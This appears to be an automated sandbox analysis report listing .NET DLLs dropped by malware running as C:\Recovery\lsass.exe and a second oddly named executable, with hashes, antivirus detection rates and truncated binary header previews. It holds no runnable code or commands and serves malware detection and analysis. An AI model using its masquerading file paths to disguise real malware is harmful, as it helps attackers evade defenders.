                                      Category:dropped
                                      Size (bytes):69632
                                      Entropy (8bit):5.932541123129161
                                      Encrypted:false
                                      SSDEEP:1536:yo63BdpcSWxaQ/RKd8Skwea/e+hTEqS/ABGegJBb07j:j+9W+p/LEqu6GegG
                                      MD5:F4B38D0F95B7E844DD288B441EBC9AAF
                                      SHA1:9CBF5C6E865AE50CEC25D95EF70F3C8C0F2A6CBF
                                      SHA-256:AAB95596475CA74CEDE5BA50F642D92FA029F6F74F6FAEAE82A9A07285A5FB97
                                      SHA-512:2300D8FC857986DC9560225DE36C221C6ECB4F98ADB954D896ED6AFF305C3A3C05F5A9F1D5EF0FC9094355D60327DDDFAFC81A455596DCD28020A9A89EF50E1A
                                      Malicious:true
                                      Antivirus:
                                      • Antivirus: ReversingLabs, Detection: 50%
                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....;.d.........." .................'... ...@....@.. ....................................@.................................\'..O....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................'......H.......l....^..........t...............................................c|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k:..AOg.......s..t".5.
                                      Process:C:\Recovery\lsass.exe
                                      File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                      Category:dropped
                                      Size (bytes):32256
                                      Entropy (8bit):5.631194486392901
                                      Encrypted:false
                                      SSDEEP:384:lP/qZmINM9WPs9Q617EsO2m2g7udB2HEsrW+a4yiym4I16Gl:lP/imaPyQ4T5dsHSt9nQ
                                      MD5:D8BF2A0481C0A17A634D066A711C12E9
                                      SHA1:7CC01A58831ED109F85B64FE4920278CEDF3E38D
                                      SHA-256:2B93377EA087225820A9F8E4F331005A0C600D557242366F06E0C1EAE003D669
                                      SHA-512:7FB4EB786528AD15DF044F16973ECA05F05F035491E9B1C350D6AA30926AAE438E98F37BE1BB80510310A91BC820BA3EDDAF7759D7D599BCDEBA0C9DF6302F60
                                      Malicious:true
                                      Antivirus:
                                      • Antivirus: ReversingLabs, Detection: 25%
                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....v..........n.... ........@.. ....................................@.....................................O.................................................................................... ............... ..H............text...tt... ...v.................. ..`.rsrc................x..............@..@.reloc...............|..............@..B................P.......H........c...1..........._..h....................................................................................................................................................................Q.1k...].~g.v................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................
                                      Process:C:\Recovery\lsass.exe
                                      File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                      Category:dropped
                                      Size (bytes):32256
                                      Entropy (8bit):5.631194486392901
                                      Encrypted:false
                                      SSDEEP:384:lP/qZmINM9WPs9Q617EsO2m2g7udB2HEsrW+a4yiym4I16Gl:lP/imaPyQ4T5dsHSt9nQ
                                      MD5:D8BF2A0481C0A17A634D066A711C12E9
                                      SHA1:7CC01A58831ED109F85B64FE4920278CEDF3E38D
                                      SHA-256:2B93377EA087225820A9F8E4F331005A0C600D557242366F06E0C1EAE003D669
                                      SHA-512:7FB4EB786528AD15DF044F16973ECA05F05F035491E9B1C350D6AA30926AAE438E98F37BE1BB80510310A91BC820BA3EDDAF7759D7D599BCDEBA0C9DF6302F60
                                      Malicious:true
                                      Antivirus:
                                      • Antivirus: ReversingLabs, Detection: 25%
                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....v..........n.... ........@.. ....................................@.....................................O.................................................................................... ............... ..H............text...tt... ...v.................. ..`.rsrc................x..............@..@.reloc...............|..............@..B................P.......H........c...1..........._..h....................................................................................................................................................................Q.1k...].~g.v................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................
                                      Process:C:\Recovery\lsass.exe
                                      File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                      Category:dropped
                                      Size (bytes):23552
                                      Entropy (8bit):5.519109060441589
                                      Encrypted:false
                                      SSDEEP:384:RlLUkmZJzLSTbmzQ0VeUfYtjdrrE2VMRSKOpRP07PUbTr4e16AKrl+7T:RlYZnV7YtjhrfMcKOpjb/9odg7T
                                      MD5:0B2AFABFAF0DD55AD21AC76FBF03B8A0
                                      SHA1:6BB6ED679B8BEDD26FDEB799849FB021F92E2E09
                                      SHA-256:DD4560987BD87EF3E6E8FAE220BA22AA08812E9743352523C846553BD99E4254
                                      SHA-512:D5125AD4A28CFA2E1F2C1D2A7ABF74C851A5FB5ECB9E27ECECAF1473F10254C7F3B0EEDA39337BD9D1BEFE0596E27C9195AD26EDF34538972A312179D211BDDA
                                      Malicious:true
                                      Antivirus:
                                      • Antivirus: ReversingLabs, Detection: 8%
                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....T...........s... ........@.. ..............................vX....@.................................Xs..S.................................................................................... ............... ..H............text....S... ...T.................. ..`.rsrc................V..............@..@.reloc...............Z..............@..B.................s......H.......PO...$...........N......................................................................................................................................................................6...GN..n.....................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................
                                      Process:C:\Recovery\lsass.exe
                                      File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                      Category:dropped
                                      Size (bytes):69632
                                      Entropy (8bit):5.932541123129161
                                      Encrypted:false
                                      SSDEEP:1536:yo63BdpcSWxaQ/RKd8Skwea/e+hTEqS/ABGegJBb07j:j+9W+p/LEqu6GegG
                                      MD5:F4B38D0F95B7E844DD288B441EBC9AAF
                                      SHA1:9CBF5C6E865AE50CEC25D95EF70F3C8C0F2A6CBF
                                      SHA-256:AAB95596475CA74CEDE5BA50F642D92FA029F6F74F6FAEAE82A9A07285A5FB97
                                      SHA-512:2300D8FC857986DC9560225DE36C221C6ECB4F98ADB954D896ED6AFF305C3A3C05F5A9F1D5EF0FC9094355D60327DDDFAFC81A455596DCD28020A9A89EF50E1A
                                      Malicious:true
                                      Antivirus:
                                      • Antivirus: ReversingLabs, Detection: 50%
                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....;.d.........." .................'... ...@....@.. ....................................@.................................\'..O....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................'......H.......l....^..........t...............................................c|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k:..AOg.......s..t".5.
                                      Process:C:\Recovery\lsass.exe
                                      File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                      Category:dropped
                                      Size (bytes):69632
                                      Entropy (8bit):5.932541123129161
                                      Encrypted:false
                                      SSDEEP:1536:yo63BdpcSWxaQ/RKd8Skwea/e+hTEqS/ABGegJBb07j:j+9W+p/LEqu6GegG
                                      MD5:F4B38D0F95B7E844DD288B441EBC9AAF
                                      SHA1:9CBF5C6E865AE50CEC25D95EF70F3C8C0F2A6CBF
                                      SHA-256:AAB95596475CA74CEDE5BA50F642D92FA029F6F74F6FAEAE82A9A07285A5FB97
                                      SHA-512:2300D8FC857986DC9560225DE36C221C6ECB4F98ADB954D896ED6AFF305C3A3C05F5A9F1D5EF0FC9094355D60327DDDFAFC81A455596DCD28020A9A89EF50E1A
                                      Malicious:true
                                      Antivirus:
                                      • Antivirus: ReversingLabs, Detection: 50%
                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....;.d.........." .................'... ...@....@.. ....................................@.................................\'..O....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................'......H.......l....^..........t...............................................c|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k:..AOg.......s..t".5.
                                      Process:C:\Recovery\lsass.exe
                                      File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                      Category:dropped
                                      Size (bytes):69632
                                      Entropy (8bit):5.932541123129161
                                      Encrypted:false
                                      SSDEEP:1536:yo63BdpcSWxaQ/RKd8Skwea/e+hTEqS/ABGegJBb07j:j+9W+p/LEqu6GegG
                                      MD5:F4B38D0F95B7E844DD288B441EBC9AAF
                                      SHA1:9CBF5C6E865AE50CEC25D95EF70F3C8C0F2A6CBF
                                      SHA-256:AAB95596475CA74CEDE5BA50F642D92FA029F6F74F6FAEAE82A9A07285A5FB97
                                      SHA-512:2300D8FC857986DC9560225DE36C221C6ECB4F98ADB954D896ED6AFF305C3A3C05F5A9F1D5EF0FC9094355D60327DDDFAFC81A455596DCD28020A9A89EF50E1A
                                      Malicious:true
                                      Antivirus:
                                      • Antivirus: ReversingLabs, Detection: 50%
                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....;.d.........." .................'... ...@....@.. ....................................@.................................\'..O....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................'......H.......l....^..........t...............................................c|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k:..AOg.......s..t".5.
                                      Process:C:\HypercontainerServerhostDll\ComponentBrowserruntimeHostNet.exe
                                      File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                      Category:dropped
                                      Size (bytes):69632
                                      Entropy (8bit):5.932541123129161
                                      Encrypted:false
                                      SSDEEP:1536:yo63BdpcSWxaQ/RKd8Skwea/e+hTEqS/ABGegJBb07j:j+9W+p/LEqu6GegG
                                      MD5:F4B38D0F95B7E844DD288B441EBC9AAF
                                      SHA1:9CBF5C6E865AE50CEC25D95EF70F3C8C0F2A6CBF
                                      SHA-256:AAB95596475CA74CEDE5BA50F642D92FA029F6F74F6FAEAE82A9A07285A5FB97
                                      SHA-512:2300D8FC857986DC9560225DE36C221C6ECB4F98ADB954D896ED6AFF305C3A3C05F5A9F1D5EF0FC9094355D60327DDDFAFC81A455596DCD28020A9A89EF50E1A
                                      Malicious:true
                                      Antivirus:
                                      • Antivirus: ReversingLabs, Detection: 50%
                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....;.d.........." .................'... ...@....@.. ....................................@.................................\'..O....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................'......H.......l....^..........t...............................................c|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k:..AOg.......s..t".5.
                                      Process:C:\Recovery\lsass.exe
                                      File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                      Category:dropped
                                      Size (bytes):85504
                                      Entropy (8bit):5.8769270258874755
                                      Encrypted:false
                                      SSDEEP:1536:p7Oc/sAwP1Q1wUww6vtZNthMx4SJ2ZgjlrL7BzZZmKYT:lOc/sAwP1Q1wUwhHBMx4a2iJjBzZZm9
                                      MD5:E9CE850DB4350471A62CC24ACB83E859
                                      SHA1:55CDF06C2CE88BBD94ACDE82F3FEA0D368E7DDC6
                                      SHA-256:7C95D3B38114E7E4126CB63AADAF80085ED5461AB0868D2365DD6A18C946EA3A
                                      SHA-512:9F4CBCE086D8A32FDCAEF333C4AE522074E3DF360354822AA537A434EB43FF7D79B5AF91E12FB62D57974B9ED5B4D201DDE2C22848070D920C9B7F5AE909E2CA
                                      Malicious:true
                                      Antivirus:
                                      • Antivirus: ReversingLabs, Detection: 71%
                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." .....F...........e... ........@.. ...............................@....@..................................e..S.................................................................................... ............... ..H............text....E... ...F.................. ..`.rsrc................H..............@..@.reloc...............L..............@..B.................e......H.......p...(j..................................................................................c|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k
                                      Process:C:\Recovery\lsass.exe
                                      File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                      Category:dropped
                                      Size (bytes):69632
                                      Entropy (8bit):5.932541123129161
                                      Encrypted:false
                                      SSDEEP:1536:yo63BdpcSWxaQ/RKd8Skwea/e+hTEqS/ABGegJBb07j:j+9W+p/LEqu6GegG
                                      MD5:F4B38D0F95B7E844DD288B441EBC9AAF
                                      SHA1:9CBF5C6E865AE50CEC25D95EF70F3C8C0F2A6CBF
                                      SHA-256:AAB95596475CA74CEDE5BA50F642D92FA029F6F74F6FAEAE82A9A07285A5FB97
                                      SHA-512:2300D8FC857986DC9560225DE36C221C6ECB4F98ADB954D896ED6AFF305C3A3C05F5A9F1D5EF0FC9094355D60327DDDFAFC81A455596DCD28020A9A89EF50E1A
                                      Malicious:true
                                      Antivirus:
                                      • Antivirus: ReversingLabs, Detection: 50%
                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....;.d.........." .................'... ...@....@.. ....................................@.................................\'..O....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................'......H.......l....^..........t...............................................c|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k:..AOg.......s..t".5.
                                      Process:C:\Recovery\lsass.exe
                                      File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                      Category:dropped
                                      Size (bytes):85504
                                      Entropy (8bit):5.8769270258874755
                                      Encrypted:false
                                      SSDEEP:1536:p7Oc/sAwP1Q1wUww6vtZNthMx4SJ2ZgjlrL7BzZZmKYT:lOc/sAwP1Q1wUwhHBMx4a2iJjBzZZm9
                                      MD5:E9CE850DB4350471A62CC24ACB83E859
                                      SHA1:55CDF06C2CE88BBD94ACDE82F3FEA0D368E7DDC6
                                      SHA-256:7C95D3B38114E7E4126CB63AADAF80085ED5461AB0868D2365DD6A18C946EA3A
                                      SHA-512:9F4CBCE086D8A32FDCAEF333C4AE522074E3DF360354822AA537A434EB43FF7D79B5AF91E12FB62D57974B9ED5B4D201DDE2C22848070D920C9B7F5AE909E2CA
                                      Malicious:true
                                      Antivirus:
                                      • Antivirus: ReversingLabs, Detection: 71%
                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." .....F...........e... ........@.. ...............................@....@..................................e..S.................................................................................... ............... ..H............text....E... ...F.................. ..`.rsrc................H..............@..@.reloc...............L..............@..B.................e......H.......p...(j..................................................................................c|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k
                                      Process:C:\Recovery\lsass.exe
                                      File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                      Category:dropped
                                      Size (bytes):85504
                                      Entropy (8bit):5.8769270258874755
                                      Encrypted:false
                                      SSDEEP:1536:p7Oc/sAwP1Q1wUww6vtZNthMx4SJ2ZgjlrL7BzZZmKYT:lOc/sAwP1Q1wUwhHBMx4a2iJjBzZZm9
                                      MD5:E9CE850DB4350471A62CC24ACB83E859
                                      SHA1:55CDF06C2CE88BBD94ACDE82F3FEA0D368E7DDC6
                                      SHA-256:7C95D3B38114E7E4126CB63AADAF80085ED5461AB0868D2365DD6A18C946EA3A
                                      SHA-512:9F4CBCE086D8A32FDCAEF333C4AE522074E3DF360354822AA537A434EB43FF7D79B5AF91E12FB62D57974B9ED5B4D201DDE2C22848070D920C9B7F5AE909E2CA
                                      Malicious:true
                                      Antivirus:
                                      • Antivirus: ReversingLabs, Detection: 71%
                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." .....F...........e... ........@.. ...............................@....@..................................e..S.................................................................................... ............... ..H............text....E... ...F.................. ..`.rsrc................H..............@..@.reloc...............L..............@..B.................e......H.......p...(j..................................................................................c|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k
                                      Process:C:\Recovery\lsass.exe
                                      File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                      Category:dropped
                                      Size (bytes):23552
                                      Entropy (8bit):5.519109060441589
                                      Encrypted:false
                                      SSDEEP:384:RlLUkmZJzLSTbmzQ0VeUfYtjdrrE2VMRSKOpRP07PUbTr4e16AKrl+7T:RlYZnV7YtjhrfMcKOpjb/9odg7T
                                      MD5:0B2AFABFAF0DD55AD21AC76FBF03B8A0
                                      SHA1:6BB6ED679B8BEDD26FDEB799849FB021F92E2E09
                                      SHA-256:DD4560987BD87EF3E6E8FAE220BA22AA08812E9743352523C846553BD99E4254
                                      SHA-512:D5125AD4A28CFA2E1F2C1D2A7ABF74C851A5FB5ECB9E27ECECAF1473F10254C7F3B0EEDA39337BD9D1BEFE0596E27C9195AD26EDF34538972A312179D211BDDA
                                      Malicious:true
                                      Antivirus:
                                      • Antivirus: ReversingLabs, Detection: 8%
                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....T...........s... ........@.. ..............................vX....@.................................Xs..S.................................................................................... ............... ..H............text....S... ...T.................. ..`.rsrc................V..............@..@.reloc...............Z..............@..B.................s......H.......PO...$...........N......................................................................................................................................................................6...GN..n.....................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................
                                      Process:C:\Recovery\lsass.exe
                                      File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                      Category:dropped
                                      Size (bytes):85504
                                      Entropy (8bit):5.8769270258874755
                                      Encrypted:false
                                      SSDEEP:1536:p7Oc/sAwP1Q1wUww6vtZNthMx4SJ2ZgjlrL7BzZZmKYT:lOc/sAwP1Q1wUwhHBMx4a2iJjBzZZm9
                                      MD5:E9CE850DB4350471A62CC24ACB83E859
                                      SHA1:55CDF06C2CE88BBD94ACDE82F3FEA0D368E7DDC6
                                      SHA-256:7C95D3B38114E7E4126CB63AADAF80085ED5461AB0868D2365DD6A18C946EA3A
                                      SHA-512:9F4CBCE086D8A32FDCAEF333C4AE522074E3DF360354822AA537A434EB43FF7D79B5AF91E12FB62D57974B9ED5B4D201DDE2C22848070D920C9B7F5AE909E2CA
                                      Malicious:true
                                      Antivirus:
                                      • Antivirus: ReversingLabs, Detection: 71%
                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." .....F...........e... ........@.. ...............................@....@..................................e..S.................................................................................... ............... ..H............text....E... ...F.................. ..`.rsrc................H..............@..@.reloc...............L..............@..B.................e......H.......p...(j..................................................................................c|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k
                                      Process:C:\HypercontainerServerhostDll\ComponentBrowserruntimeHostNet.exe
                                      File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                      Category:dropped
                                      Size (bytes):32256
                                      Entropy (8bit):5.631194486392901
                                      Encrypted:false
                                      SSDEEP:384:lP/qZmINM9WPs9Q617EsO2m2g7udB2HEsrW+a4yiym4I16Gl:lP/imaPyQ4T5dsHSt9nQ
                                      MD5:D8BF2A0481C0A17A634D066A711C12E9
                                      SHA1:7CC01A58831ED109F85B64FE4920278CEDF3E38D
                                      SHA-256:2B93377EA087225820A9F8E4F331005A0C600D557242366F06E0C1EAE003D669
                                      SHA-512:7FB4EB786528AD15DF044F16973ECA05F05F035491E9B1C350D6AA30926AAE438E98F37BE1BB80510310A91BC820BA3EDDAF7759D7D599BCDEBA0C9DF6302F60
                                      Malicious:true
                                      Antivirus:
                                      • Antivirus: ReversingLabs, Detection: 25%
                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....v..........n.... ........@.. ....................................@.....................................O.................................................................................... ............... ..H............text...tt... ...v.................. ..`.rsrc................x..............@..@.reloc...............|..............@..B................P.......H........c...1..........._..h....................................................................................................................................................................Q.1k...].~g.v................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................
                                      Process:C:\Recovery\lsass.exe
                                      File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                      Category:dropped
                                      Size (bytes):32256
                                      Entropy (8bit):5.631194486392901
                                      Encrypted:false
                                      SSDEEP:384:lP/qZmINM9WPs9Q617EsO2m2g7udB2HEsrW+a4yiym4I16Gl:lP/imaPyQ4T5dsHSt9nQ
                                      MD5:D8BF2A0481C0A17A634D066A711C12E9
                                      SHA1:7CC01A58831ED109F85B64FE4920278CEDF3E38D
                                      SHA-256:2B93377EA087225820A9F8E4F331005A0C600D557242366F06E0C1EAE003D669
                                      SHA-512:7FB4EB786528AD15DF044F16973ECA05F05F035491E9B1C350D6AA30926AAE438E98F37BE1BB80510310A91BC820BA3EDDAF7759D7D599BCDEBA0C9DF6302F60
                                      Malicious:true
                                      Antivirus:
                                      • Antivirus: ReversingLabs, Detection: 25%
                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....v..........n.... ........@.. ....................................@.....................................O.................................................................................... ............... ..H............text...tt... ...v.................. ..`.rsrc................x..............@..@.reloc...............|..............@..B................P.......H........c...1..........._..h....................................................................................................................................................................Q.1k...].~g.v................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................
                                      Process:C:\Recovery\lsass.exe
                                      File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                      Category:dropped
                                      Size (bytes):32256
                                      Entropy (8bit):5.631194486392901
                                      Encrypted:false
                                      SSDEEP:384:lP/qZmINM9WPs9Q617EsO2m2g7udB2HEsrW+a4yiym4I16Gl:lP/imaPyQ4T5dsHSt9nQ
                                      MD5:D8BF2A0481C0A17A634D066A711C12E9
                                      SHA1:7CC01A58831ED109F85B64FE4920278CEDF3E38D
                                      SHA-256:2B93377EA087225820A9F8E4F331005A0C600D557242366F06E0C1EAE003D669
                                      SHA-512:7FB4EB786528AD15DF044F16973ECA05F05F035491E9B1C350D6AA30926AAE438E98F37BE1BB80510310A91BC820BA3EDDAF7759D7D599BCDEBA0C9DF6302F60
                                      Malicious:true
                                      Antivirus:
                                      • Antivirus: ReversingLabs, Detection: 25%
                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....v..........n.... ........@.. ....................................@.....................................O.................................................................................... ............... ..H............text...tt... ...v.................. ..`.rsrc................x..............@..@.reloc...............|..............@..B................P.......H........c...1..........._..h....................................................................................................................................................................Q.1k...].~g.v................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................
                                      Process:C:\Recovery\lsass.exe
                                      File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                      Category:dropped
                                      Size (bytes):23552
                                      Entropy (8bit):5.519109060441589
                                      Encrypted:false
                                      SSDEEP:384:RlLUkmZJzLSTbmzQ0VeUfYtjdrrE2VMRSKOpRP07PUbTr4e16AKrl+7T:RlYZnV7YtjhrfMcKOpjb/9odg7T
                                      MD5:0B2AFABFAF0DD55AD21AC76FBF03B8A0
                                      SHA1:6BB6ED679B8BEDD26FDEB799849FB021F92E2E09
                                      SHA-256:DD4560987BD87EF3E6E8FAE220BA22AA08812E9743352523C846553BD99E4254
                                      SHA-512:D5125AD4A28CFA2E1F2C1D2A7ABF74C851A5FB5ECB9E27ECECAF1473F10254C7F3B0EEDA39337BD9D1BEFE0596E27C9195AD26EDF34538972A312179D211BDDA
                                      Malicious:true
                                      Antivirus:
                                      • Antivirus: ReversingLabs, Detection: 8%
                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....T...........s... ........@.. ..............................vX....@.................................Xs..S.................................................................................... ............... ..H............text....S... ...T.................. ..`.rsrc................V..............@..@.reloc...............Z..............@..B.................s......H.......PO...$...........N......................................................................................................................................................................6...GN..n.....................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................
                                      Process:C:\Recovery\lsass.exe
                                      File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                      Category:dropped
                                      Size (bytes):85504
                                      Entropy (8bit):5.8769270258874755
                                      Encrypted:false
                                      SSDEEP:1536:p7Oc/sAwP1Q1wUww6vtZNthMx4SJ2ZgjlrL7BzZZmKYT:lOc/sAwP1Q1wUwhHBMx4a2iJjBzZZm9
                                      MD5:E9CE850DB4350471A62CC24ACB83E859
                                      SHA1:55CDF06C2CE88BBD94ACDE82F3FEA0D368E7DDC6
                                      SHA-256:7C95D3B38114E7E4126CB63AADAF80085ED5461AB0868D2365DD6A18C946EA3A
                                      SHA-512:9F4CBCE086D8A32FDCAEF333C4AE522074E3DF360354822AA537A434EB43FF7D79B5AF91E12FB62D57974B9ED5B4D201DDE2C22848070D920C9B7F5AE909E2CA
                                      Malicious:true
                                      Antivirus:
                                      • Antivirus: ReversingLabs, Detection: 71%
                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." .....F...........e... ........@.. ...............................@....@..................................e..S.................................................................................... ............... ..H............text....E... ...F.................. ..`.rsrc................H..............@..@.reloc...............L..............@..B.................e......H.......p...(j..................................................................................c|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k
                                      Process:C:\Recovery\lsass.exe
                                      File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                      Category:dropped
                                      Size (bytes):69632
                                      Entropy (8bit):5.932541123129161
                                      Encrypted:false
                                      SSDEEP:1536:yo63BdpcSWxaQ/RKd8Skwea/e+hTEqS/ABGegJBb07j:j+9W+p/LEqu6GegG
                                      MD5:F4B38D0F95B7E844DD288B441EBC9AAF
